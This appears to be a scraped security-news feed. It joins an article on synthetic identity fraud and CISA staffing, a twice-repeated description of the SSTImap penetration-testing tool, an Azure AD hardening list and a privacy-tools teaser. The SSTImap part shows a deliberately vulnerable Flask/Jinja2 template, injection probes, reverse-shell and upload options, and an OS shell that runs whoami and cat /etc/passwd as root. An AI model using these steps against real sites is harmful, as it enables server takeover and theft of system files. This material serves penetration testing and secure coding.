“Identity verification is the foundation of virtually all security systems, digital and physical, and AI is making it easier than ever to undermine this process,” Mike Sexton, a Senior Policy Advisor for AI & Digital Technology at national think tank Third Way, tells The Cipher Brief. “AI makes it easier for attackers to simulate real voices or hack and steal private credentials at unprecedented scale. This is poised to exacerbate the cyberthreats the United States faces broadly, especially civilians, underscoring the danger of Donald Trump’s sweeping job cuts at the Cybersecurity and Infrastructure Security Agency.”

The Trump administration’s proposed Fiscal Year 2026 budget would eliminate 1,083 positions at CISA, reducing staffing by nearly 30 percent from roughly 3,732 roles to around 2,649.

Save your virtual seat now for The Cyber Initiatives Group Winter Summit on December 10 from 12p – 3p ET for more conversations on cyber, AI and the future of national security.

The Industrialization of Identity Theft

The Constella report, based on analysis of 80 billion breached records from 2016 to 2024, highlights a growing reliance on synthetic identities—fake personas created from both real and fabricated data. Once limited to financial scams, these identities are now being used for far more dangerous purposes, including espionage, infrastructure sabotage, and disinformation campaigns.

State-backed actors and criminal groups are increasingly using identity fraud to bypass traditional cybersecurity defenses. In one case, hackers used stolen administrator credentials at an energy sector company to silently monitor internal communications for more than a year, mapping both its digital and physical operations.

“In 2024, identity moved further into the crosshairs of cybercriminal operations,” the report states. “From mass-scale infostealer infections to the recycling of decade-old credentials, attackers are industrializing identity compromise with unprecedented efficiency and reach. This year’s data exposes a machine-scale identity threat economy, where automation and near-zero cost tactics turn identities into the enterprise’s most targeted assets.”

Dave Chronister, CEO of Parameter Security and a prominent ethical hacker, links the rise in identity-based threats to broader social changes.

“Many companies operate with teams that have never met face-to-face. Business is conducted over LinkedIn, decisions authorized via messaging apps, and meetings are held on Zoom instead of in physical conference rooms,” he tells The Cipher Brief. “This has created an environment where identities are increasingly accepted at face value, and that’s exactly what adversaries are exploiting.”

When Identities Become Weapons

This threat isn’t hypothetical. In early July, a breach by the China-linked hacking group Volt Typhoon exposed Army National Guard network diagrams and administrative credentials. U.S. officials confirmed the hackers used stolen credentials and “living off the land” techniques—relying on legitimate admin tools to avoid detection.

In the context of cybersecurity, “living off the land” refers to attackers (like the China-linked hacking group Volt Typhoon) don't bring their own malicious software or tools into a compromised network. Instead, they use the legitimate software, tools, and functionalities that are already present on the victim's systems and within their network.

“It’s far more difficult to detect a fake worker or the misuse of legitimate credentials than to flag malware on a network,” Chronister explained.

Unlike traditional identity theft, which hijacks existing identities, synthetic identity fraud creates entirely new ones using a blend of real and fake data—such as Social Security numbers from minors or the deceased. These identities can be used to obtain official documents, government benefits, or even access secure networks while posing as real people.

“Insider threats, whether fully synthetic or stolen identities, are among the most dangerous types of attacks an organization can face, because they grant adversaries unfettered access to sensitive information and systems,” Chronister continued.

Insider threats involve attacks that come from individuals with legitimate access, such as employees or fake identities posing as trusted users, making them harder to detect and often more damaging.

Constella reports these identities are 20 times harder to detect than traditional fraud. Once established with a digital history, a synthetic identity can even appear more trustworthy than a real person with limited online presence.

“GenAI tools now enable foreign actors to communicate in pitch-perfect English while adopting realistic personas. Deepfake technology makes it possible to create convincing visual identities from just a single photo,” Chronister said. “When used together, these technologies blur the line between real and fake in ways that legacy security models were never designed to address.”

Washington Lags Behind

U.S. officials acknowledge that the country remains underprepared. Multiple recent hearings and reports from the Department of Homeland Security and the House Homeland Security Committee have flagged digital identity as a growing national security vulnerability—driven by threats from China, transnational cybercrime groups, and the rise of synthetic identities.

The committee has urged urgent reforms, including mandatory quarterly “identity hygiene” audits for organizations managing critical infrastructure, modernized authentication protocols, and stronger public-private intelligence sharing.

Meanwhile, the Defense Intelligence Agency’s 2025 Global Threat Assessment warns:

“Advanced technology is also enabling foreign intelligence services to target our personnel and activities in new ways. The rapid pace of innovation will only accelerate in the coming years, continually generating means for our adversaries to threaten U.S. interests.”

An intelligence official not authorized to speak publicly told The Cipher Brief that identity manipulation will increasingly serve as a primary attack vector to exploit political divisions, hijack supply chains, or infiltrate democratic processes.

Need a daily dose of reality on national and global security issues? Subscriber to The Cipher Brief’s Nightcap newsletter, delivering expert insights on today’s events – right to your inbox. Sign up for free today.

Private Sector on the Frontline

For now, much of the responsibility falls on private companies—especially those in banking, healthcare, and energy. According to Constella, nearly one in three breaches last year targeted sectors classified as critical infrastructure.

“It's never easy to replace a core technology, particularly in critical infrastructure sectors. That’s why these systems often stay in place for many years if not decades,” said Chronister.

Experts warn that reacting to threats after they’ve occurred is no longer sufficient. Companies must adopt proactive defenses, including constant identity verification, behavioral analytics, and zero-trust models that treat every user as untrusted by default.

However, technical upgrades aren’t enough. Sexton argues the United States needs a national digital identity framework that moves beyond outdated systems like Social Security numbers and weak passwords.

“The adherence to best-in-class identity management solutions is critical. In practice for the private sector, this means relying on trusted third parties like Google, Meta, Apple, and others for identity verification,” he explained. “For the U.S. government, these are systems like REAL ID, ID.me, and Login.gov. We must also be mindful that heavy reliance on these identity hubs creates concentration risk, making their security a critical national security chokepoint.”

Building a National Identity Defense

Some progress is underway. The federal Login.gov platform is expanding its fraud prevention capabilities, with plans to incorporate Mobile Driver’s Licenses and biometric logins by early 2026. But implementation remains limited in scale, and many agencies still rely on outdated systems that don’t support basic protections like multi-factor authentication.

“I would like to see the US government further develop and scale solutions like Login.gov and ID.me and then interoperate with credit agencies and law enforcement to respond to identity theft in real time,” Sexton said. “While securing those systems will always be a moving target, users’ data is ultimately safer in the hands of a well-resourced public entity than in those of private firms already struggling to defend their infrastructure.”

John Dwyer, Deputy CTO of Binary Defense and former Head of Research at IBM X-Force, agreed that a unified national system is needed.

“The United States needs a national digital identity framework—but one built with a balance of security, privacy, and interoperability,” Dwyer told The Cipher Brief. “As threat actors increasingly target digital identities to compromise critical infrastructure, the stakes for getting identity right have never been higher.”

He emphasized that any framework must be built on multi-factor authentication, phishing resistance, cryptographic proofs, and decentralized systems—not centralized databases.

“Public-private collaboration is crucial: government agencies can serve as trusted identity verification sources (e.g., DMV, passport authorities), while the private sector can drive innovation in delivery and authentication,” Dwyer added. “A governance board with cross-sector representation should oversee policy and trust models.”

Digital identities are no longer just a privacy concern—they’re weapons, vulnerabilities, and battlegrounds in 21st-century conflict. As foreign adversaries grow more sophisticated and U.S. defenses lag behind, the question is no longer if, but how fast America can respond.

The question now is whether the United States can shift fast enough to keep up.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief because National Security is Everyone’s Business.

SSTImap - Automatic SSTI Detection Tool With Interactive Interface

By: Unknown

 

SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name in an unsafe way, as it is concatenated to the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚═════════════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u argument or url command. After that, you can use run command to check URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use Ctrl+C to abort them without stopping a program.

By the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.

To get a full list of interactive commands, use command help in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine RCE Blind Code evaluation File read File write
Mako Python
Jinja2 Python
Python (code eval) Python
Tornado Python
Nunjucks JavaScript
Pug JavaScript
doT JavaScript
Marko JavaScript
JavaScript (code eval) JavaScript
Dust (<= dustjs-helpers@1.5.0) JavaScript
EJS JavaScript
Ruby (code eval) Ruby
Slim Ruby
ERB Ruby
Smarty (unsecured) PHP
Smarty (secured) PHP
PHP (code eval) PHP
Twig (<=1.19) PHP
Freemarker Java
Velocity Java
Twig (>1.19) × × × × ×
Dust (> dustjs-helpers@1.5.0) × × × × ×

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


SSTImap - Automatic SSTI Detection Tool With Interactive Interface

By: Unknown

 

SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name in an unsafe way, as it is concatenated to the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚═════════════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u argument or url command. After that, you can use run command to check URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use Ctrl+C to abort them without stopping a program.

By the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.

To get a full list of interactive commands, use command help in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine RCE Blind Code evaluation File read File write
Mako Python
Jinja2 Python
Python (code eval) Python
Tornado Python
Nunjucks JavaScript
Pug JavaScript
doT JavaScript
Marko JavaScript
JavaScript (code eval) JavaScript
Dust (<= dustjs-helpers@1.5.0) JavaScript
EJS JavaScript
Ruby (code eval) Ruby
Slim Ruby
ERB Ruby
Smarty (unsecured) PHP
Smarty (secured) PHP
PHP (code eval) PHP
Twig (<=1.19) PHP
Freemarker Java
Velocity Java
Twig (>1.19) × × × × ×
Dust (> dustjs-helpers@1.5.0) × × × × ×

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


8 Things to Avoid In Azure Active Directory

By: tribe47

Organizations that don’t put in the extra effort needed to secure their Azure Active Directory leave themselves vulnerable and open to data leaks, unauthorized data access, and cyberattacks targeting their infrastructure.

Cybercriminals can decrypt user passwords and compromise administrator accounts by hacking into Azure AD Connect, the service that synchronizes Azure AD with Windows AD servers. Once inside the system, the attackers can exfiltrate and encrypt an organization’s most sensitive data.

Azure AD users often overlook crucial steps, such as implementing multi-factor authentication for all users joining the Active Directory with a device. Failure to require MFA makes it easier for an attacker to join a malicious device to an organization using the credentials of a compromised account.

Increased security risk isn’t the only consequence of a poorly set up AD. Misconfigurations can cause process bottlenecks leading to poor performance. The following guide was created by CQURE’s cybersecurity expert – Michael Graffneter specialized in securing Azure Active Directory, to help you detect and remedy some of the most common Azure AD misconfiguration mistakes.

8 Things to Avoid In Azure Active Directory

 

1. Production Tenants Used for Tests

During security assessments, we often see production tenants being used by developers for testing their “Hello World” apps. We recommend that companies have standalone tenants for testing new apps and settings. Needless to say, the amount of PII accessible through such tenants should be minimized.

2. Overpopulated Global Admins

User accounts that are assigned the Global Admin’s role have unlimited control over your Azure AD tenant and in many cases also over your on-prem AD forest. Consider using less privileged roles to delegate permissions. As an example, security auditors should be fine with the Security Reader or Global Reader role.

3. Not Enforcing MFA

Company administrators tend to create “temporary” MFA exclusions for selected accounts and then forget about them, making them permanent. And due to misconfigurations, trusted IP address ranges sometimes include guest WiFi networks. Even with the free tier of Azure AD, one can use Security defaults to enable multi-factor authentication for all users. And users assigned the Global Administrator role can be configured to use multi-factor authentication at all times.

4. Overprivileged Applications

Many applications registered in Azure AD are assigned much stronger privileges than they actually require. It is also not obvious that app owners can impersonate their applications, which sometimes leads to privilege escalation. Registered applications and service principals should be regularly audited, as they can be used by malicious actors as persistent backdoors to the tenant.

5. Fire-and-Forget Approach to Configuration

Azure AD is constantly evolving and new security features are introduced regularly. But many of these newly added features need to be enabled and configured before they can be used, including the super-cool passwordless authentication methods. Azure AD deployment should therefore not be considered a one-time operation but rather a continuous process.

6. Insecure Azure AD Connect Servers

Azure AD Connect servers are used to synchronize Azure AD with on-premises AD, for which they need permissions to perform modifications in both environments. This fact is well-known to hackers, who might misuse AAD Connect to compromise the entire organization. These servers should therefore be considered Tier 0 resources and only Domain Admins should have administrative rights on them.

7. Lack of Monitoring

Even with an Azure AD Premium plan, user activity logs are only stored for 30 days. Is this default behavior really enough for your organization? Luckily, custom retention policies can be configured when Azure AD logs are forwarded to the Azure Log Analytics service, to the Unified Audit Log feature of Microsoft 365, or to 3rd-party SIEM solutions. And components like Azure AD Identity Protection or Azure Sentinel can automatically detect anomalies in user activity.

8. Default Settings

Not all default settings provide the highest security possible. Users can register 3rd party applications in Azure AD, passwordless authentication methods are disabled and ADFS endpoints with NTLM authentication that bypasses the Extranet Smart Lockout feature are published on proxies. These and other settings should be reviewed during Azure AD deployment and adjusted to fit organizational security policies.

Azure AD is a critical attack surface that needs continuous monitoring for misconfigurations. We hope this guide makes managing the security of your AD easier by helping you to detect and resolve vulnerabilities.

The post 8 Things to Avoid In Azure Active Directory appeared first on CQURE Academy.

The Best Tools for Secure Online Privacy

By: IG GURU
Since the emergence of the COVID 19 pandemic, most businesses and individuals have embraced remote working. However, with more people working from home, the issue of online privacy has taken precedence. Now more than ever, everyone is concerned about their privacy on online platforms like Whatsapp and Facebook. In this article, we explore solutions to […]
❌